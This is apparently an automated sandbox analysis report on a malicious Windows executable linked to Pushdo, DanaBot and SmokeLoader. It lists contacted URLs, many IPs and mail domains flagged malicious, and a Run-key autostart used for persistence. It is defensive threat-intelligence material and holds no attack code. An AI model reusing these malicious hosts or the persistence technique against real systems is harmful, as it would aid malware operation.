00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/profesionalni-setiCX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/elektricni-pribor-za-merilnike-tlaka/CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://www.credo.edu.pl/0CX17SY6xF6.exe, 00000000.00000003.577604491.0000000000E54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2FCX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                  217.69.139.150
                                                                                                                                                                                                                                                  mxs.mail.ruRussian Federation
                                                                                                                                                                                                                                                  47764MAILRU-ASMailRuRUtrue
                                                                                                                                                                                                                                                  76.74.184.61
                                                                                                                                                                                                                                                  alexpope.bizCanada
                                                                                                                                                                                                                                                  13768COGECO-PEER1CAtrue
                                                                                                                                                                                                                                                  107.180.58.31
                                                                                                                                                                                                                                                  orbitgas.comUnited States
                                                                                                                                                                                                                                                  26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                                                                                                                                                  203.137.75.45
                                                                                                                                                                                                                                                  okashimo.comJapan4694IDCFIDCFrontierIncJPtrue
                                                                                                                                                                                                                                                  172.67.152.159
                                                                                                                                                                                                                                                  www.tvtools.fiUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  104.20.55.214
                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                  153.126.211.112
                                                                                                                                                                                                                                                  mikihan.comJapan7684SAKURA-ASAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                  217.160.0.131
                                                                                                                                                                                                                                                  mackusick.deGermany
                                                                                                                                                                                                                                                  8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                                                                                                  3.130.204.160
                                                                                                                                                                                                                                                  hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comUnited States
                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                  198.49.23.144
                                                                                                                                                                                                                                                  midap.comUnited States
                                                                                                                                                                                                                                                  53831SQUARESPACEUStrue
                                                                                                                                                                                                                                                  194.143.194.23
                                                                                                                                                                                                                                                  reproar.comSpain
                                                                                                                                                                                                                                                  8311REDESTELRedestel-RedesdigitalesdeTelecomunicacionenItrue
                                                                                                                                                                                                                                                  5.189.171.125
                                                                                                                                                                                                                                                  muhr-soehne.deGermany
                                                                                                                                                                                                                                                  51167CONTABODEfalse
                                                                                                                                                                                                                                                  49.212.243.77
                                                                                                                                                                                                                                                  listel.co.jpJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                  83.223.113.46
                                                                                                                                                                                                                                                  dataform.co.ukUnited Kingdom
                                                                                                                                                                                                                                                  29017GYRONGBtrue
                                                                                                                                                                                                                                                  91.229.22.126
                                                                                                                                                                                                                                                  pleszew.policja.gov.plPoland
                                                                                                                                                                                                                                                  198704CSD-KGP-PL-ASBiuroLacznosciiInformatykiPLtrue
                                                                                                                                                                                                                                                  5.39.75.157
                                                                                                                                                                                                                                                  bosado.comFrance
                                                                                                                                                                                                                                                  16276OVHFRtrue
                                                                                                                                                                                                                                                  217.74.161.133
                                                                                                                                                                                                                                                  cnti.krsn.ruRussian Federation
                                                                                                                                                                                                                                                  16300INTERTAX-AREARUtrue
                                                                                                                                                                                                                                                  66.226.70.66
                                                                                                                                                                                                                                                  mail.airmail.netUnited States
                                                                                                                                                                                                                                                  30447INFB2-ASUSfalse
                                                                                                                                                                                                                                                  13.248.169.48
                                                                                                                                                                                                                                                  www.findbc.comUnited States
                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                  85.128.196.22
                                                                                                                                                                                                                                                  strazynski.plPoland
                                                                                                                                                                                                                                                  15967NAZWAPLtrue
                                                                                                                                                                                                                                                  202.254.236.40
                                                                                                                                                                                                                                                  www.naoi-a.comJapan9371SAKURA-CSAKURAInternetIncJPfalse
                                                                                                                                                                                                                                                  81.2.194.241
                                                                                                                                                                                                                                                  www.edimart.huCzech Republic
                                                                                                                                                                                                                                                  24806INTERNET-CZKtis238403KtisCZfalse
                                                                                                                                                                                                                                                  37.59.243.164
                                                                                                                                                                                                                                                  aluminox.esFrance
                                                                                                                                                                                                                                                  16276OVHFRtrue
                                                                                                                                                                                                                                                  217.19.254.22
                                                                                                                                                                                                                                                  shanks.co.ukUnited Kingdom
                                                                                                                                                                                                                                                  60819SAFENAMES-ASGBtrue
                                                                                                                                                                                                                                                  185.163.45.187
                                                                                                                                                                                                                                                  softizer.comMoldova Republic of
                                                                                                                                                                                                                                                  39798MIVOCLOUDMDtrue
                                                                                                                                                                                                                                                  216.177.137.32
                                                                                                                                                                                                                                                  fortknox.bmUnited States
                                                                                                                                                                                                                                                  3955321P-WSSUSfalse
                                                                                                                                                                                                                                                  219.94.129.97
                                                                                                                                                                                                                                                  web-york.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                  49.212.232.113
                                                                                                                                                                                                                                                  unicus.jpJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                  74.208.215.145
                                                                                                                                                                                                                                                  indonesiamedia.comUnited States
                                                                                                                                                                                                                                                  8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                                                                                                  104.21.30.14
                                                                                                                                                                                                                                                  cubodown.comUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  54.36.175.146
                                                                                                                                                                                                                                                  biurohera.plFrance
                                                                                                                                                                                                                                                  16276OVHFRtrue
                                                                                                                                                                                                                                                  46.30.60.158
                                                                                                                                                                                                                                                  ncn.deGermany
                                                                                                                                                                                                                                                  15817MITTWALD-ASMittwaldCMServiceGmbHundCoKGDEtrue
                                                                                                                                                                                                                                                  104.21.23.9
                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  88.86.118.82
                                                                                                                                                                                                                                                  deckoviny.czCzech Republic
                                                                                                                                                                                                                                                  39392SUPERNETWORK_CZtrue
                                                                                                                                                                                                                                                  192.99.226.184
                                                                                                                                                                                                                                                  s5w.comCanada
                                                                                                                                                                                                                                                  16276OVHFRtrue
                                                                                                                                                                                                                                                  49.212.180.178
                                                                                                                                                                                                                                                  kumaden.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                  195.78.66.50
                                                                                                                                                                                                                                                  www.photo4b.comPoland
                                                                                                                                                                                                                                                  41079SUPERHOST-PL-ASPLfalse
                                                                                                                                                                                                                                                  137.118.26.67
                                                                                                                                                                                                                                                  fnw.usUnited States
                                                                                                                                                                                                                                                  6250NEONOVA-NETUSfalse
                                                                                                                                                                                                                                                  188.166.152.188
                                                                                                                                                                                                                                                  www.c9dd.comNetherlands
                                                                                                                                                                                                                                                  14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                  210.140.73.39
                                                                                                                                                                                                                                                  at-shun.comJapan4694IDCFIDCFrontierIncJPtrue
                                                                                                                                                                                                                                                  70.39.251.249
                                                                                                                                                                                                                                                  quadlock.comUnited States
                                                                                                                                                                                                                                                  54641INMOTI-1USfalse
                                                                                                                                                                                                                                                  104.26.7.221
                                                                                                                                                                                                                                                  www.valdal.comUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  62.75.216.137
                                                                                                                                                                                                                                                  www.tyrns.comGermany
                                                                                                                                                                                                                                                  8972GD-EMEA-DC-SXB1DEfalse
                                                                                                                                                                                                                                                  13.224.103.99
                                                                                                                                                                                                                                                  d2kt7vovxa5e81.cloudfront.netUnited States
                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                  62.122.170.171
                                                                                                                                                                                                                                                  shztm.ruCzech Republic
                                                                                                                                                                                                                                                  50245SERVEREL-ASNLtrue
                                                                                                                                                                                                                                                  72.251.233.245
                                                                                                                                                                                                                                                  www.koz1.netUnited States
                                                                                                                                                                                                                                                  29791VOXEL-DOT-NETUSfalse
                                                                                                                                                                                                                                                  13.224.103.91
                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                  203.0.113.0
                                                                                                                                                                                                                                                  nme.co.jpReserved
                                                                                                                                                                                                                                                  136518WA-GOVERNMENT-AS-APWAGovernmentprojectAUtrue
                                                                                                                                                                                                                                                  216.239.32.21
                                                                                                                                                                                                                                                  calvinly.comUnited States
                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                  208.100.26.245
                                                                                                                                                                                                                                                  atb-lit.comUnited States
                                                                                                                                                                                                                                                  32748STEADFASTUStrue
                                                                                                                                                                                                                                                  142.250.27.26
                                                                                                                                                                                                                                                  gmail-smtp-in.l.google.comUnited States
                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                  51.159.3.117
                                                                                                                                                                                                                                                  ossir.orgFrance
                                                                                                                                                                                                                                                  12876OnlineSASFRtrue
                                                                                                                                                                                                                                                  82.201.61.230
                                                                                                                                                                                                                                                  www.nelipak.nlNetherlands
                                                                                                                                                                                                                                                  15879KPN-INTERNEDSERVICESNLfalse
                                                                                                                                                                                                                                                  79.124.76.247
                                                                                                                                                                                                                                                  mkm-gr.comBulgaria
                                                                                                                                                                                                                                                  31083TELEPOINTBGtrue
                                                                                                                                                                                                                                                  192.124.249.3
                                                                                                                                                                                                                                                  pers.comUnited States
                                                                                                                                                                                                                                                  30148SUCURI-SECUStrue
                                                                                                                                                                                                                                                  46.19.218.80
                                                                                                                                                                                                                                                  mcseurope.nlNetherlands
                                                                                                                                                                                                                                                  20559FUNDAMENTS-ASNLtrue
                                                                                                                                                                                                                                                  52.71.57.184
                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                  192.241.158.94
                                                                                                                                                                                                                                                  nunomira.comUnited States
                                                                                                                                                                                                                                                  14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                  63.251.106.25
                                                                                                                                                                                                                                                  kewlmail.comUnited States
                                                                                                                                                                                                                                                  29791VOXEL-DOT-NETUStrue
                                                                                                                                                                                                                                                  172.67.189.68
                                                                                                                                                                                                                                                  kavram.comUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                  195.96.252.188
                                                                                                                                                                                                                                                  nlcv.bas.bgBulgaria
                                                                                                                                                                                                                                                  8745AS-BG-BASBGtrue
                                                                                                                                                                                                                                                  212.44.102.57
                                                                                                                                                                                                                                                  oozkranj.comSlovenia
                                                                                                                                                                                                                                                  43128DHH-ASSItrue
                                                                                                                                                                                                                                                  172.217.16.179
                                                                                                                                                                                                                                                  ghs.googlehosted.comUnited States
                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                  95.174.22.233
                                                                                                                                                                                                                                                  snf.itItaly
                                                                                                                                                                                                                                                  12637SEEWEBWebhostingcolocationandcloudservicesITtrue
                                                                                                                                                                                                                                                  104.21.79.166
                                                                                                                                                                                                                                                  simetar.comUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                  165.227.252.190
                                                                                                                                                                                                                                                  crcsi.orgUnited States
                                                                                                                                                                                                                                                  14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                  185.151.30.147
                                                                                                                                                                                                                                                  pertex.comUnited Kingdom
                                                                                                                                                                                                                                                  48254TWENTYIGBtrue
                                                                                                                                                                                                                                                  208.80.123.104
                                                                                                                                                                                                                                                  gbp-jp.comUnited States
                                                                                                                                                                                                                                                  16552TIGGEEUStrue
                                                                                                                                                                                                                                                  103.168.172.216
                                                                                                                                                                                                                                                  in1.smtp.messagingengine.comunknown
                                                                                                                                                                                                                                                  7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                                                                                                                                                                                  185.230.63.107
                                                                                                                                                                                                                                                  acraloc.comIsrael
                                                                                                                                                                                                                                                  58182WIX_COMILtrue
                                                                                                                                                                                                                                                  198.185.159.145
                                                                                                                                                                                                                                                  refintl.orgUnited States
                                                                                                                                                                                                                                                  53831SQUARESPACEUStrue
                                                                                                                                                                                                                                                  198.185.159.144
                                                                                                                                                                                                                                                  captlfix.comUnited States
                                                                                                                                                                                                                                                  53831SQUARESPACEUStrue
                                                                                                                                                                                                                                                  211.13.196.162
                                                                                                                                                                                                                                                  unknownJapan7514MEXComputerEngineeringConsultingLtdJPtrue
                                                                                                                                                                                                                                                  103.168.172.220
                                                                                                                                                                                                                                                  unknownunknown
                                                                                                                                                                                                                                                  7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                                                                                                                                                                                  141.193.213.20
                                                                                                                                                                                                                                                  johnlyon.orgUnited States
                                                                                                                                                                                                                                                  396845DV-PRIMARY-ASN1UStrue
                                                                                                                                                                                                                                                  35.172.94.1
                                                                                                                                                                                                                                                  themark.orgUnited States
                                                                                                                                                                                                                                                  14618AMAZON-AESUStrue
                                                                                                                                                                                                                                                  195.128.140.29
                                                                                                                                                                                                                                                  nettle.plPoland
                                                                                                                                                                                                                                                  56590RBO-NETPLtrue
                                                                                                                                                                                                                                                  159.89.244.183
                                                                                                                                                                                                                                                  wanoa.comUnited States
                                                                                                                                                                                                                                                  14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                                                                                                                  69.163.239.62
                                                                                                                                                                                                                                                  sjbs.orgUnited States
                                                                                                                                                                                                                                                  26347DREAMHOST-ASUSfalse
                                                                                                                                                                                                                                                  104.26.3.124
                                                                                                                                                                                                                                                  www.kernsafe.comUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  66.94.119.160
                                                                                                                                                                                                                                                  www.yocinc.orgUnited States
                                                                                                                                                                                                                                                  394513AWESOMENET-CORPUSfalse
                                                                                                                                                                                                                                                  204.11.56.48
                                                                                                                                                                                                                                                  impexnc.comVirgin Islands (BRITISH)
                                                                                                                                                                                                                                                  40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                                                                                                                                  154.203.14.100
                                                                                                                                                                                                                                                  www.mobilnic.netSeychelles
                                                                                                                                                                                                                                                  135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
                                                                                                                                                                                                                                                  108.167.164.216
                                                                                                                                                                                                                                                  aevga.comUnited States
                                                                                                                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                                                                                                                  5.196.166.214
                                                                                                                                                                                                                                                  www.spanesi.comFrance
                                                                                                                                                                                                                                                  16276OVHFRtrue
                                                                                                                                                                                                                                                  64.125.133.18
                                                                                                                                                                                                                                                  reglera.comUnited States
                                                                                                                                                                                                                                                  393631DLSS-CA-EMERYVILLE-ASUSfalse
                                                                                                                                                                                                                                                  213.186.33.16
                                                                                                                                                                                                                                                  doggybag.orgFrance
                                                                                                                                                                                                                                                  16276OVHFRtrue
                                                                                                                                                                                                                                                  213.186.33.17
                                                                                                                                                                                                                                                  item-pr.comFrance
                                                                                                                                                                                                                                                  16276OVHFRfalse
                                                                                                                                                                                                                                                  219.94.128.87
                                                                                                                                                                                                                                                  angework.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                  93.187.206.66
                                                                                                                                                                                                                                                  www.yoruksut.comTurkey
                                                                                                                                                                                                                                                  43391NETDIREKT-ASTRtrue
                                                                                                                                                                                                                                                  82.208.6.9
                                                                                                                                                                                                                                                  insia.comCzech Republic
                                                                                                                                                                                                                                                  15685CASABLANCA-ASInternetCollocationProviderCZtrue
                                                                                                                                                                                                                                                  87.230.93.218
                                                                                                                                                                                                                                                  dwid.deGermany
                                                                                                                                                                                                                                                  8972GD-EMEA-DC-SXB1DEtrue
                                                                                                                                                                                                                                                  104.26.15.53
                                                                                                                                                                                                                                                  www.elpro.siUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  157.112.176.4
                                                                                                                                                                                                                                                  www.11tochi.netJapan9371SAKURA-CSAKURAInternetIncJPfalse
                                                                                                                                                                                                                                                  75.2.70.75
                                                                                                                                                                                                                                                  kustnara.comUnited States
                                                                                                                                                                                                                                                  16509AMAZON-02UStrue
                                                                                                                                                                                                                                                  52.86.6.113
                                                                                                                                                                                                                                                  hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                  18.165.183.19
                                                                                                                                                                                                                                                  d2r2uj0bnofxxz.cloudfront.netUnited States
                                                                                                                                                                                                                                                  3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                  54.161.222.85
                                                                                                                                                                                                                                                  hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                  211.1.226.67
                                                                                                                                                                                                                                                  www.ka-mo-me.comJapan7671MCNETNTTSmartConnectCorporationJPfalse
                                                                                                                                                                                                                                                  IP
                                                                                                                                                                                                                                                  127.0.0.1
                                                                                                                                                                                                                                                  Joe Sandbox Version:38.0.0 Beryl
                                                                                                                                                                                                                                                  Analysis ID:1281452
                                                                                                                                                                                                                                                  Start date and time:2023-07-27 21:51:07 +02:00
                                                                                                                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                                                                  Overall analysis duration:0h 16m 0s
                                                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                                                                  Number of analysed new started processes analysed:17
                                                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                                                  • HDC enabled
                                                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                                                  Sample file name:CX17SY6xF6.exe
                                                                                                                                                                                                                                                  Original Sample Name:db47df7cf51747e533c968da7452f1ce6d20f465d7fcd6e2eac559266ac3e9ed.exe
                                                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                                                  Classification:mal100.spre.troj.evad.winEXE@27/4@2054/100
                                                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                                                  HDC Information:
                                                                                                                                                                                                                                                  • Successful, ratio: 69.4% (good quality ratio 60.9%)
                                                                                                                                                                                                                                                  • Quality average: 71.8%
                                                                                                                                                                                                                                                  • Quality standard deviation: 34.1%
                                                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                                                  • Number of executed functions: 85
                                                                                                                                                                                                                                                  • Number of non-executed functions: 97
                                                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): audiodg.exe, WMIADAP.exe
                                                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 172.67.142.169, 104.21.63.28, 204.79.197.212
                                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): www.ottospm.com.cdn.cloudflare.net, ctldl.windowsupdate.com, a-0010.a-msedge.net
                                                                                                                                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                                                  21:52:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                  21:52:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                  21:53:15API Interceptor2x Sleep call for process: CX17SY6xF6.exe modified
                                                                                                                                                                                                                                                  21:53:49API Interceptor2x Sleep call for process: pigalicapi.exe modified
                                                                                                                                                                                                                                                  21:53:59API Interceptor11x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  holp-ai.comnhVJ8J5qOt.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  fs7AQcREFX.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  6gjnnBAbpc.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  iJzpyjAehB.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  EksRd2mRLH.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  d4bNCWDk1F.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  1EsDtA4mep.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  lCVLEXbxih.exeGet hashmaliciousPushdo, DCRat, SmokeLoaderBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
